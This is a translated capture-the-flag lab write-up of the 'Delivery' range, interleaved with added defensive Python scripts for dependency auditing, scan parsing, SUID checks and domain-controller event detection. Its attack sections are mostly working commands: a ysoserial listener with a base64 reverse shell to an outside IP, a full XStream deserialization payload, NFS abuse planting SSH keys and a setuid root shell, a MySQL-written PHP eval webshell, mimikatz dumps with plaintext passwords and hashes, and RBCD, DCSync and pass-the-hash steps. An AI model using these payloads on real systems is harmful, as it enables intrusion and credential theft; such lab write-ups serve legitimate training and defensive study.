春秋云镜-Delivery

Delivery

flag1

Information gathering

./fscan -h 39.98.110.215
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 39.98.110.215 is alive
[*] Icmp alive hosts len is: 1
39.98.110.215:80 open
39.98.110.215:8080 open
39.98.110.215:21 open
39.98.110.215:22 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://39.98.110.215 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[+] ftp://39.98.110.215:21:anonymous
[->]1.txt
[->]pom.xml
[*] WebTitle: http://39.98.110.215:8080 code:200 len:3655 title:公司发货单

External foothold

FTP

There is an FTP service

ftp://39.98.110.215:21:anonymous

Anonymous login works

1.txt is empty

Look at pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.7.2</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<groupId>com.example</groupId>
<artifactId>ezjava</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>ezjava</name>
<description>ezjava</description>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-thymeleaf</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>

<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>

<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.16</version>
</dependency>

<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
</dependencies>

<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>

</project>
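From a supply-chain point of view the interesting part of this pom.xml is the pair of pinned dependency versions. The following is an added example, not code from the write-up or from the target project: it parses a pom.xml with the standard library and flags the two coordinates against a minimum-safe table kept in the script (XStream 1.4.17 is the release that fixed CVE-2021-29505; commons-collections 3.2.2 is the release that added the deserialization guard). The embedded pom is a trimmed copy of the one above, and the minimum-version table is an assumption maintained by the script, not something the page states.

```python
import xml.etree.ElementTree as ET

NS = {"m": "http://maven.apache.org/POM/4.0.0"}

# Minimum versions considered safe for the two libraries the pom pins.
# Assumed table maintained by this script (not taken from the write-up):
# XStream 1.4.17 fixes CVE-2021-29505; commons-collections 3.2.2 adds the
# InvokerTransformer deserialization check used by the CommonsCollections gadgets.
MIN_SAFE = {
    ("com.thoughtworks.xstream", "xstream"): ("1.4.17", "CVE-2021-29505"),
    ("commons-collections", "commons-collections"): ("3.2.2", "unsafe deserialization gadget chain"),
}

# Constructed sample: trimmed copy of the pom.xml recovered from the FTP share.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <artifactId>ezjava</artifactId>
  <dependencies>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
    </dependency>
    <dependency>
      <groupId>com.thoughtworks.xstream</groupId>
      <artifactId>xstream</artifactId>
      <version>1.4.16</version>
    </dependency>
    <dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>3.2.1</version>
    </dependency>
  </dependencies>
</project>
"""


def parse_version(v):
    """Turn '1.4.16' into (1, 4, 16); non-numeric suffixes such as '-SNAPSHOT' are ignored."""
    parts = []
    for piece in v.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def audit_pom(xml_text):
    """Return (groupId, artifactId, version, reason) for every dependency below its safe floor.

    A dependency without an explicit <version> is inherited from the parent BOM and is
    reported for manual verification rather than silently passed.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for dep in root.findall(".//m:dependencies/m:dependency", NS):
        gid = dep.findtext("m:groupId", default="", namespaces=NS)
        aid = dep.findtext("m:artifactId", default="", namespaces=NS)
        ver = dep.findtext("m:version", default=None, namespaces=NS)
        key = (gid, aid)
        if key not in MIN_SAFE:
            continue
        min_ver, why = MIN_SAFE[key]
        if ver is None:
            findings.append((gid, aid, None, f"version managed by parent; verify >= {min_ver}"))
        elif parse_version(ver) < parse_version(min_ver):
            findings.append((gid, aid, ver, f"below {min_ver}: {why}"))
    return findings


if __name__ == "__main__":
    for gid, aid, ver, reason in audit_pom(SAMPLE_POM):
        print(f"{gid}:{aid}:{ver} -> {reason}")
```

Running the script against the sample reports both xstream 1.4.16 and commons-collections 3.2.1; bumping xstream to 1.4.17 in the input removes the first finding. Leaking a pom.xml through an anonymous FTP share is what makes this kind of version-based targeting cheap, so the same check belongs in the build pipeline where the pom is not public.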

XStream 1.4.16

xstream

Go straight for the XStream deserialization RCE (CVE-2021-29505)

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC82Mi4yMzQuODIuMTExLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}"
POST /just_sumbit_it HTTP/1.1
Host: 39.98.110.215:8080
Content-Length: 3115
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: application/xml;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://39.98.110.215:8080
Referer: http://39.98.110.215:8080/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>62.234.82.111</string>
<int>1099</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>62.234.82.111</host>
<port>1099</port>
</ctx>
</candidates>
</aliases>
</nullIter>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>

flag2&3

Upload fscan and Stowaway (easier to use than frp)

Notes on Stowaway usage

  • Single hop

    • vps: ./linux_x64_admin -l port -s 123 # 123 is the key, choose any value

    • target: ./linux_x64_agent -c vps_ip:port -s 123 --reconnect 8 # retry the connection after 8 seconds, optional

    • Once the target has run the agent, on the vps run use 0, then socks PORT

    • The socks proxy is then vps_ip PORT

  • Multi-hop

    Suppose there are targets 1 and 2. Target 2 has two (or more) NICs; target 1 exposes a service to the internet; target 1 and NIC A of target 2 are on the same internal network, which cannot reach NIC B. Goal: reach the services behind NIC B.

    • First set up the single-hop proxy from the vps to target 1, as in the single-hop section
    • Suppose the single-hop proxy is use 0; inside use 0 run listen, choose 1, and choose port 9999. This is equivalent to listening on port 9999 on target 1
    • On target 2 run ./linux_x64_agent -c target1_ip:9999 -s 123 --reconnect 8
    • Once the vps shows the connection succeeded, run use 1, then socks port; that is the new socks proxy
start infoscan
(icmp) Target 172.22.13.14 is alive
(icmp) Target 172.22.13.6 is alive
(icmp) Target 172.22.13.28 is alive
(icmp) Target 172.22.13.57 is alive
[*] Icmp alive hosts len is: 4
172.22.13.28:80 open
172.22.13.57:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.6:445 open
172.22.13.6:139 open
172.22.13.28:445 open
172.22.13.28:139 open
172.22.13.6:135 open
172.22.13.28:135 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.28:3306 open
172.22.13.6:88 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo:
[*]172.22.13.28
[->]WIN-HAUWOLAO
[->]172.22.13.28
[*] NetInfo:
[*]172.22.13.6
[->]WIN-DC
[->]172.22.13.6
[*] WebTitle: http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.22.13.6 [+]DC XIAORANG\WIN-DC
[*] WebTitle: http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
[*] NetBios: 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
[*] WebTitle: http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
[+] ftp://172.22.13.14:21:anonymous
[->]1.txt
[->]pom.xml
[*] WebTitle: http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
[+] mysql:172.22.13.28:3306:root 123456
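Both fscan runs in this write-up (the external one against 39.98.110.215 and this internal one over the Stowaway socks proxy) produce the same line formats, and a responder who finds such output on a compromised host wants it turned into an inventory quickly. The following is an added example, not part of the write-up or of fscan itself: it parses the alive-host, open-port, WebTitle, NetBios and [+] finding lines into a per-host dict and lists the hosts that deserve attention first (credential findings and anything identified as a domain controller). The sample text is constructed in the shape of the output above; the regexes are assumptions derived from those lines, not an official fscan output specification.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the fscan output quoted in this write-up.
SAMPLE_FSCAN = """start infoscan
(icmp) Target 172.22.13.14 is alive
(icmp) Target 172.22.13.6 is alive
[*] Icmp alive hosts len is: 2
172.22.13.14:80 open
172.22.13.14:21 open
172.22.13.6:445 open
172.22.13.6:88 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.22.13.6 [+]DC XIAORANG\\WIN-DC
[+] ftp://172.22.13.14:21:anonymous
[->]1.txt
[+] mysql:172.22.13.28:3306:root 123456
"""

# Line shapes assumed from the output above (fscan has no formal output spec).
ALIVE_RE = re.compile(r"^\(icmp\) Target (\S+) is alive$")
PORT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+) open$")
TITLE_RE = re.compile(r"^\[\*\] WebTitle: (\S+) code:(\d+) len:\d+ title:(.*)$")
NETBIOS_RE = re.compile(r"^\[\*\] NetBios: (\S+) (.*)$")
# Covers both "[+] ftp://host:21:anonymous" and "[+] mysql:host:3306:root 123456"
FINDING_RE = re.compile(r"^\[\+\] (\w+)(?:://|:)(\d{1,3}(?:\.\d{1,3}){3}):(\d+):(.*)$")


def new_host():
    return {"alive": False, "ports": [], "web": [], "netbios": "", "findings": []}


def parse_fscan(text):
    """Turn fscan console output into a per-host inventory dict keyed by IP."""
    hosts = defaultdict(new_host)
    for raw in text.splitlines():
        line = raw.strip()
        if m := ALIVE_RE.match(line):
            hosts[m.group(1)]["alive"] = True
        elif m := PORT_RE.match(line):
            hosts[m.group(1)]["ports"].append(int(m.group(2)))
        elif m := TITLE_RE.match(line):
            url, code, title = m.groups()
            host = url.split("//", 1)[1].split(":")[0].rstrip("/")
            hosts[host]["web"].append((url, int(code), title.strip()))
        elif m := NETBIOS_RE.match(line):
            hosts[m.group(1)]["netbios"] = m.group(2)
        elif m := FINDING_RE.match(line):
            service, host, port, detail = m.groups()
            hosts[host]["findings"].append((service, int(port), detail.strip()))
    for h in hosts.values():
        h["ports"].sort()
    return dict(hosts)


def priority_hosts(inventory):
    """Hosts to look at first: any credential or anonymous-access finding,
    plus anything fscan tagged as a domain controller (or that serves Kerberos)."""
    out = []
    for ip, h in inventory.items():
        reasons = [f"{svc}:{port} {detail}" for svc, port, detail in h["findings"]]
        if "[+]DC" in h["netbios"] or 88 in h["ports"]:
            reasons.append("domain controller (Kerberos/NetBIOS)")
        if reasons:
            out.append((ip, reasons))
    return sorted(out)


if __name__ == "__main__":
    for ip, reasons in priority_hosts(parse_fscan(SAMPLE_FSCAN)):
        print(ip, "->", "; ".join(reasons))
```

On the sample this lists 172.22.13.14 (anonymous FTP), 172.22.13.28 (root/123456 on MySQL) and 172.22.13.6 (DC), which is exactly the order of the rest of this write-up; the anonymous FTP and the weak MySQL password are the two findings a defender could have closed before the scan ever ran.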

Targets

172.22.13.14 entry host

172.22.13.6 DC (domain controller)

172.22.13.28 mysql

172.22.13.57 CentOS

172.22.13.57

NFS

wget http://archive.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.3.4-2.5ubuntu3_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libn/libnfsidmap/libnfsidmap2_0.25-5.1ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc3_1.2.5-1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/r/rpcbind/rpcbind_1.2.5-8_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/k/keyutils/keyutils_1.6-6ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc-common_1.2.5-1_all.deb
sudo dpkg -i libnfsidmap2_0.25-5.1ubuntu1_amd64.deb && \
sudo dpkg -i libtirpc-common_1.2.5-1_all.deb && \
sudo dpkg -i libtirpc3_1.2.5-1_amd64.deb && \
sudo dpkg -i rpcbind_1.2.5-8_amd64.deb && \
sudo dpkg -i keyutils_1.6-6ubuntu1_amd64.deb && \
sudo dpkg -i nfs-common_1.3.4-2.5ubuntu3_amd64.deb
cd /
mkdir temp
mount -t nfs 172.22.13.57:/ ./temp -o nolock

ssh-keygen -t rsa -b 4096
cd /temp/home/joyce/
mkdir .ssh
cat /cg.pub >> /temp/home/joyce/.ssh/authorized_keys
# drop a setuid root binary into /temp/home/joyce
echo '#include <stdlib.h>
#include <unistd.h>
int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > root.c
gcc root.c -o root
chmod +s root

SSH connection

./root # gives a root shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ssh -i /root/.ssh/id_rsa joyce@172.22.13.57

Another way to read the flag

find / -user root -perm -4000 -exec ls -ldb {} \;
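The find command above is the same one a host audit would run, and the root helper planted through NFS is exactly what it should catch: a setuid-root (and setgid) binary sitting in a home directory rather than under /usr/bin. The following is an added example, not part of the write-up: it parses ls -ld lines from that find output and reports every setuid-root file that is not in a baseline set or lives outside the system directories. The sample output, the baseline set and the trusted prefixes are constructed assumptions; in practice the baseline comes from a golden image of the same build. Note also that the NFS trick only works because the export lets a client root keep uid 0 (no_root_squash); with the default root_squash the file would be owned by nobody and could not be made setuid root.

```python
# Constructed sample of `find / -user root -perm -4000 -exec ls -ldb {} \;` output.
# The last line mirrors the helper binary this write-up plants over the NFS mount.
SAMPLE_FIND = """-rwsr-xr-x 1 root root 55528 Jan 20  2022 /usr/bin/mount
-rwsr-xr-x 1 root root 71912 Jan 20  2022 /usr/bin/su
-rwsr-xr-x 1 root root 232416 Feb  2  2022 /usr/bin/sudo
-rwsr-xr-x 1 root root 47480 Jan 20  2022 /usr/bin/passwd
-rwsr-sr-x 1 root root 16696 Mar 22 17:02 /home/joyce/root
"""

# Assumed baseline of setuid-root files for this build; a real one comes from a golden image.
BASELINE = {"/usr/bin/mount", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/passwd"}
# Directories where setuid binaries are normally installed by the package manager.
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/bin/", "/sbin/")


def parse_ls_line(line):
    """Return (mode, owner, path) from one `ls -ld` line.

    The path is the ninth whitespace-separated field; splitting with maxsplit=8
    keeps paths that contain spaces intact.
    """
    parts = line.split(None, 8)
    if len(parts) < 9:
        return None
    return parts[0], parts[2], parts[8]


def unexpected_suid(find_output, baseline=BASELINE):
    """List setuid-root files that are not in the baseline, with the reasons they stand out."""
    findings = []
    for raw in find_output.splitlines():
        parsed = parse_ls_line(raw.strip())
        if not parsed:
            continue
        mode, owner, path = parsed
        if path in baseline:
            continue
        reasons = ["not in baseline"]
        if not path.startswith(TRUSTED_PREFIXES):
            reasons.append("outside system directories")
        if mode[6] == "s":  # group execute position: 's' means setgid is set too
            reasons.append("setgid as well")
        findings.append({"path": path, "owner": owner, "mode": mode, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in unexpected_suid(SAMPLE_FIND):
        print(f["mode"], f["owner"], f["path"], "->", ", ".join(f["reasons"]))
```

On the sample only /home/joyce/root is reported, with all three reasons. Running this periodically (or feeding the find output into a file-integrity tool) turns the write-up's privilege-escalation step into a high-signal alert.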

There is an FTP service, but we have no permission to upload to the original FTP server

Start one manually (not inside the newly created temp directory, there is no write permission there)

python3 -m pyftpdlib -p 6666 -u test -P test -w &

172.22.13.28

mysql:172.22.13.28:3306:root 123456

172.22.13.28 has a weak MySQL password; start a global proxy and connect with Navicat

Checked secure_file_priv and found it empty, so a webshell can be written to disk

show variables like "secure_file_priv";

Logs

show variables like "%general%";

Write a webshell

select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";

Connect with AntSword

flag4

172.22.13.6

Enable RDP; services started by phpStudy usually run with administrator privileges

net user dog qwer1234! /add
net localgroup administrators dog /add

BloodHound shows that the user chenglei is in the ACL Admins group and has WriteDacl over WIN-DC, so either RBCD or DCSync is possible

Dump the hashes

Run it from an administrator cmd, then read test.txt

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > test.txt
Authentication Id : 0 ; 211625 (00000000:00033aa9)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2025/3/22 17:36:54
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :

Username : chenglei

Domain : XIAORANG.LAB

NTLM : 0c00801c30594a1b8eaa889d237c5382

Password : Xt61f3LBhg1

RBCD

Did not succeed; probably a clock skew problem on the machine

proxychains python3 addcomputer.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -dc-host xiaorang.lab -computer-name 'TEST$' -computer-pass 'P@ssw0rd'

proxychains python3 rbcd.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -action write -delegate-to 'WIN-DC$' -delegate-from 'TEST$'

proxychains python3 getST.py xiaorang.lab/'TEST$':'P@ssw0rd' -spn cifs/WIN-DC.xiaorang.lab -impersonate Administrator -dc-ip 172.22.13.6

export KRB5CCNAME=Administrator@cifs_WIN-DC.xiaorang.lab@XIAORANG.LAB.ccache

Then add the DC to /etc/hosts, after which it should connect without a password

proxychains python3 psexec.py Administrator@WIN-DC.xiaorang.lab -k -no-pass -dc-ip 172.22.13.6

The above did not work; tried the following, also unsuccessful

proxychains python3 psexec.py Administrator@172.22.13.6 -k -no-pass -dc-ip 172.22.13.6

DCSync

proxychains4 python dacledit.py xiaorang.lab/chenglei -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -rights DCSync -principal chenglei -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.13.6

Dump hashes

proxychains4 python3 secretsdump.py xiaorang.lab/chenglei:Xt61f3LBhg1@172.22.13.6 -just-dc

Administrator:500:aad3b435b51404eeaad3b435b51404ee:6341235defdaed66fb7b682665752c9a:::

proxychains crackmapexec smb 172.22.13.6 -u administrator -H6341235defdaed66fb7b682665752c9a -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"
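Every step of the domain takeover above leaves a distinct trace in the DC's Security log when object auditing is enabled: addcomputer.py creates a computer account (event 4741), rbcd.py writes msDS-AllowedToActOnBehalfOfOtherIdentity on WIN-DC (event 5136), dacledit.py rewrites the domain object's nTSecurityDescriptor (event 5136), and secretsdump.py exercises the replication extended rights, which appear as event 4662 with the DS-Replication-Get-Changes GUIDs in the Properties field. The following is an added example, not part of the write-up or of any SIEM product: a detector that runs these four rules over events represented as dicts whose keys follow the EventData field names of the Windows Security log. The sample events are constructed to mirror the actions above; the set of domain controller accounts is an assumption that a real deployment would load from the directory.

```python
import re

GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Extended-right GUIDs that permit directory replication; a non-DC principal using them is DCSync.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"
ACL_ATTR = "ntsecuritydescriptor"
# Assumed list of domain controller computer accounts; load it from AD in a real deployment.
DC_ACCOUNTS = {"WIN-DC$"}

# Constructed sample events, in the order the write-up's actions would produce them.
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectUserName": "chenglei", "TargetUserName": "TEST$"},
    {"EventID": 5136, "SubjectUserName": "chenglei",
     "ObjectDN": "CN=WIN-DC,OU=Domain Controllers,DC=xiaorang,DC=lab",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"EventID": 5136, "SubjectUserName": "chenglei",
     "ObjectDN": "DC=xiaorang,DC=lab",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    # Normal replication by a DC: must not alert.
    {"EventID": 4662, "SubjectUserName": "WIN-DC$",
     "Properties": "%%7688\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account exercising replication rights: DCSync.
    {"EventID": 4662, "SubjectUserName": "chenglei",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def detect(events, dc_accounts=DC_ACCOUNTS):
    """Return (rule, subject, detail) tuples for the events that match one of the four rules."""
    alerts = []
    for e in events:
        eid, who = e.get("EventID"), e.get("SubjectUserName", "")
        if eid == 4662:
            rights = sorted(
                REPL_RIGHTS[g.lower()]
                for g in GUID_RE.findall(e.get("Properties", ""))
                if g.lower() in REPL_RIGHTS
            )
            if rights and who not in dc_accounts:
                alerts.append(("dcsync", who, ", ".join(rights)))
        elif eid == 5136:
            attr = e.get("AttributeLDAPDisplayName", "").lower()
            if attr == RBCD_ATTR:
                alerts.append(("rbcd-write", who, e.get("ObjectDN", "")))
            elif attr == ACL_ATTR:
                alerts.append(("acl-modified", who, e.get("ObjectDN", "")))
        elif eid == 4741:
            alerts.append(("computer-account-created", who, e.get("TargetUserName", "")))
    return alerts


if __name__ == "__main__":
    for rule, who, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:25} {who:10} {detail}")
```

On the sample the DC's own replication event is ignored and the other four events produce one alert each. The rbcd-write and acl-modified rules need a SACL on the target objects (the "Audit Directory Service Changes" subcategory) before 5136 is logged at all, and the computer-account rule is noisy in environments where ordinary users may join machines (ms-DS-MachineAccountQuota), which is itself a setting worth reducing to 0.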